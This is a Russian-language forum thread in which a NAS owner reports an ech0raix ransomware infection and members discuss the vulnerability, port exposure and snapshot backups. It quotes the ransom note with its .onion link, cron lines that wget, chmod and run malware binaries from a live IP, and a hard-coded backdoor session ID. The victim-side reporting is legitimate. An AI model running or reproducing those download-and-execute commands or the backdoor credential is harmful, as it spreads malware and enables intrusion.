level001 Posted September 17, 2021 Share #1 Posted September 17, 2021 (edited) Сегодня был заражен сервер с xpenology вот таким шифровальщиком ech0raix ransomware . Успел заметить только через примерно 3 часа ,пошифровал много ,расшифровщиков нет. Создает файлы с расширением encrypt и такой текстовый файл README_FOR_DECRYPT.txtt All your data has been locked(crypted). How to unlock(decrypt) instruction located in this TOR website: http://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion/order/1LujJPFKdyG6mX7ZcYw8zmLLR7ZXrCq2g4 Use TOR browser for access .onion websites. https://duckduckgo.com/html?q=tor+browser+how+to Из того что делал вчера только обновил torrserv на версию 106 ,может совпадение может нет. Расшифровщик ключ подобрать не смог ,похоже какая то новая версия будьте внимательны. Стояла DSM 6.2.3-25426 u3 включена защита от перебора паролей,но никаких алертов нет. Пользователь admin был активен (сейчас уже нет ) . Прописаны в планировщик еще такое cd /tmp && wget --no-check-certificate -O arm http://174.62.79.238/1/crp_linux_arm;chmod 0777 ./arm;nohup ./arm --syno=true </dev/null >/dev/null 2>&1 & cd /tmp && wget --no-check-certificate -O 386 http://174.62.79.238/1/crp_linux_386;chmod 0777 ./386;nohup ./386 --syno=true </dev/null >/dev/null 2>&1 & Где еще что посмотреть кто подскажет ? Первый раз вирус на линуксе попал. Upd. Добавлю порты ,которые смотрели наружу plex * 10000 32400 TCP dscloud * 5000 5000 TCP ds * 6690 6690 TCP dsphoto * 9999 9999 TCP dsDrive * 5001 5001 TCP rtsp * 554 554 TCP DSPhoto * 1234 80 TCP Webdav_syno * 5005 5005 TCP Webdav_syno_https * 5006 5006 TCP Edited September 17, 2021 by level001 Quote Link to comment Share on other sites More sharing options...
level001 Posted September 17, 2021 Author Share #2 Posted September 17, 2021 (edited) https://xakep.ru/2021/08/10/new-ech0raix-2/ Как с этим бороться qnap патчи выпустил. Пока 5000 порт убрал из проброса ,правда есть вероятность что она по другому используется. Synology и Qnap оставили дыру у себя ,скрытого пользователя под которым можно залогиниться в любой момент ,и теперь эту дыру начали пользовать Атака пыталась использовать жестко запрограммированный идентификатор сеанса 'jisoosocoolhbsmgnt', чтобы обойти аутентификацию и выполнить команду на устройстве, чтобы получить вредоносное ПО с удаленного сервера . https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/#:~:text=CVE-2021-28799%3A Exploit in the Wild&text=This software provides backup%2C restoration,log in to the devices Так что наша любимая xpenology стала совсем небезопасной и обновлений на нее больше нет. Edited September 17, 2021 by level001 Quote Link to comment Share on other sites More sharing options...
QwertRob Posted September 18, 2021 Share #3 Posted September 18, 2021 Терзают меня смутные сомнения, что официалы из Сино могли поучаствовать в разработке этого зловреда 🤢 Quote Link to comment Share on other sites More sharing options...
level001 Posted September 18, 2021 Author Share #4 Posted September 18, 2021 Так они бэкдор для себя оставили ,теперь нас юзать будут,пока дыру не закроем. Я пока не нашел файл с таким содержимым 'jisoosocoolhbsmgnt' Возможно для синолоджи он другой. Quote Link to comment Share on other sites More sharing options...
dr_End Posted September 18, 2021 Share #5 Posted September 18, 2021 On 9/17/2021 at 8:51 PM, level001 said: Сегодня был заражен сервер с xpenology вот таким шифровальщиком ech0raix ransomware . Сообщите пожалуйста, был ли изменен пароль учётки admin и отключена данная учётная запись как рекомендуют synology? https://www.synology.com/en-global/company/news/article/2019JulyRansomware Quote Link to comment Share on other sites More sharing options...
level001 Posted September 19, 2021 Author Share #6 Posted September 19, 2021 (edited) Учетка admin была включена ,пароль изменен на стойкий. Перебор паролей запрещен с блокировкой на 10 минут. В логах никаких попыток перебора нет. Edited September 19, 2021 by level001 Quote Link to comment Share on other sites More sharing options...
Amoureux Posted September 19, 2021 Share #7 Posted September 19, 2021 2 часа назад, level001 сказал: Учетка admin была включена ,пароль изменен на стойкий. Перебор паролей запрещен с блокировкой на 10 минут. В логах никаких попыток перебора нет. Стойкий пароль это какой? - цифры ? - буквы разного регистра ? - спецсимволы ? - длинна не менее 12 знаков? - использовался только для этой учётки? Quote Link to comment Share on other sites More sharing options...
level001 Posted September 19, 2021 Author Share #8 Posted September 19, 2021 Буквы цифры разного регистра 12 знаков. Quote Link to comment Share on other sites More sharing options...
Olegin Posted September 19, 2021 Share #9 Posted September 19, 2021 И про это не забывайте... Quote Link to comment Share on other sites More sharing options...
level001 Posted September 19, 2021 Author Share #10 Posted September 19, 2021 (edited) Да не подбирали его ,я же дал ссылку на уязвимость . Там сессия админская у них прописана как бэкдор для себя любимых. Я дал ссылки выше по которым он восстанавливает вирус ,если вы его удалили .http://174.62.79.238/1/crp_linux_386 потом он его переименовывает в 386 дает права 777 и делает исполняемым и исполняет ,можете скачать и посмотреть он 4 мб . А дальше это уже надо в лаборатории Касперского работать ,чтобы дизассемблировать и понять что оно делает. на ip 174.62.79.238 такая жертва ботнета только с QNAP можете зайти и полюбоваться на него. Ему ничего не шифровали ,а засунули загрузчик ,на который ссылку другим прописывают. Edited September 19, 2021 by level001 Quote Link to comment Share on other sites More sharing options...
dr_End Posted September 19, 2021 Share #11 Posted September 19, 2021 (edited) Вчера то же почитал про него. Видимо действительно вирус прошел в систему через "задний проход")) Но вы пишете что он, вирус, выключил учётку админа, полагаю чтобы закрыть калитку от шифровальщиков конкурентов. У себя, выключил проброс портов в роутере, благо для меня это не критично, пользуюсь пока QC. Понять бы какой порт использует шифровальщик. Ели только 5000 либо 5001 то вероятно, можно для веб морды настроить другие порты. Или нет смысла, все равно переберут, как думаете? И еще вопрос к level001, стоял ли у вас антивиус, есть ли от него вообще толк? Edited September 19, 2021 by dr_End Quote Link to comment Share on other sites More sharing options...
-iliya- Posted September 20, 2021 Share #12 Posted September 20, 2021 В 19.09.2021 в 13:29, Olegin сказал: И про это не забывайте... на сколько понимаю это работает только для входа в DSM по 5000-5001 портам для ftp и для телнета\ssh никакие 2 фактора и не запрашиваются Quote Link to comment Share on other sites More sharing options...
Olegin Posted September 20, 2021 Share #13 Posted September 20, 2021 4 часа назад, -iliya- сказал: на сколько понимаю это работает только для входа в DSM по 5000-5001 портам Да, в гуй, по тем портам какие выставите в настройках dsm и/или пробросите наружу. 4 часа назад, -iliya- сказал: для ftp и для телнета\ssh никакие 2 фактора и не запрашиваются Да, но это я только через випиэн... ну, на крайняк проксю поднять можно. Quote Link to comment Share on other sites More sharing options...
-iliya- Posted September 20, 2021 Share #14 Posted September 20, 2021 2 часа назад, Olegin сказал: Да, но это я только через випиэн... ну, на крайняк проксю поднять можно. ftp через VPN - это как то странно - мне например надо файлы людям раздавать, как я их всех через vpn переруливать буду? Я вот пока подумываю что бы закрыть все порты, а открыть их через тот же win10 на VMM на котором поднять ftp через cerberus или filezillu а для доступа к nas использовать уже openvpn поднятый виртуалке, через которую уже можно попасть на nas. Quote Link to comment Share on other sites More sharing options...
Olegin Posted September 20, 2021 Share #15 Posted September 20, 2021 7 минут назад, -iliya- сказал: Я вот пока подумываю что бы закрыть все порты, а открыть их через тот же win10 на VMM Но тогда эта виртуалка будет слабым звеном. Может ftp через https проксю? Quote Link to comment Share on other sites More sharing options...
-iliya- Posted September 20, 2021 Share #16 Posted September 20, 2021 38 минут назад, Olegin сказал: Но тогда эта виртуалка будет слабым звеном. Может ftp через https проксю? не факт - на нее можно жестких антивирей посадить, да и сделать ее на любой enterptrise системе через проксю это гемор и для меня и для клиентов - клиенты это люди которым слова прокси ftp и тд это как иероглифы, да и скорость надо обеспечить максимальную. Quote Link to comment Share on other sites More sharing options...
Drones Posted September 23, 2021 Share #17 Posted September 23, 2021 (edited) Всем привет! Странно, что сино в указанной выше статье не указывает в качестве защиты моментальные снимки. На 100% снимает риски потери данных из-за шифровальщиков. При этом, восстановление занимает считанные минуты. У меня защита на 7 снимков, раз в сутки. Пусть шифруют на здоровье 😀 Edited September 23, 2021 by Drones Quote Link to comment Share on other sites More sharing options...
Amoureux Posted September 23, 2021 Share #18 Posted September 23, 2021 28 минут назад, Drones сказал: Всем привет! Странно, что сино в указанной выше статье не указывает в качестве защиты моментальные снимки. На 100% снимает риски потери данных из-за шифровальщиков. При этом, восстановление занимает считанные минуты. У меня защита на 7 снимков, раз в сутки. Пусть шифруют на здоровье 😀 Часто слышал про снапшоты, но сам не пользовался. Много места дополнительно занимает? Quote Link to comment Share on other sites More sharing options...
level001 Posted September 23, 2021 Author Share #19 Posted September 23, 2021 ext4 не поддерживает снимки . А как на brtfs перейти быстро и без потерь -это вопрос. И нужно ли это, потому что потом если что с brtfs хрен что вытащишь. Quote Link to comment Share on other sites More sharing options...
QwertRob Posted September 23, 2021 Share #20 Posted September 23, 2021 22 minutes ago, Amoureux said: Много места дополнительно занимает? Практически никакого: блочная технология творит чудеса Quote Link to comment Share on other sites More sharing options...
QwertRob Posted September 23, 2021 Share #21 Posted September 23, 2021 (edited) 3 minutes ago, level001 said: если что с brtfs хрен что вытащишь. Ну, не совсем так. Проблемы больше создает сочетание массивов с btrfs, а не она сама. Тут каждый решает сам, что ему важнее: "плюшки" btrfs или более надежный вариант восстановления на внешнем ресурсе. Edited September 23, 2021 by QwertRob Quote Link to comment Share on other sites More sharing options...
level001 Posted September 23, 2021 Author Share #22 Posted September 23, 2021 Ну я не вижу нормального способа конвертации в btrfs. Quote Link to comment Share on other sites More sharing options...
-iliya- Posted September 23, 2021 Share #23 Posted September 23, 2021 а где в сино снимки делать? у меня как раз BTRFS на всех сино, в VMM знаю и делаю снимки, а для самой системы не видел Quote Link to comment Share on other sites More sharing options...
level001 Posted September 23, 2021 Author Share #24 Posted September 23, 2021 Приложение snapshot replication/ Quote Link to comment Share on other sites More sharing options...
QwertRob Posted September 23, 2021 Share #25 Posted September 23, 2021 4 hours ago, level001 said: Ну я не вижу нормального способа конвертации в btrfs. А его и нет . Только строить с нуля. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.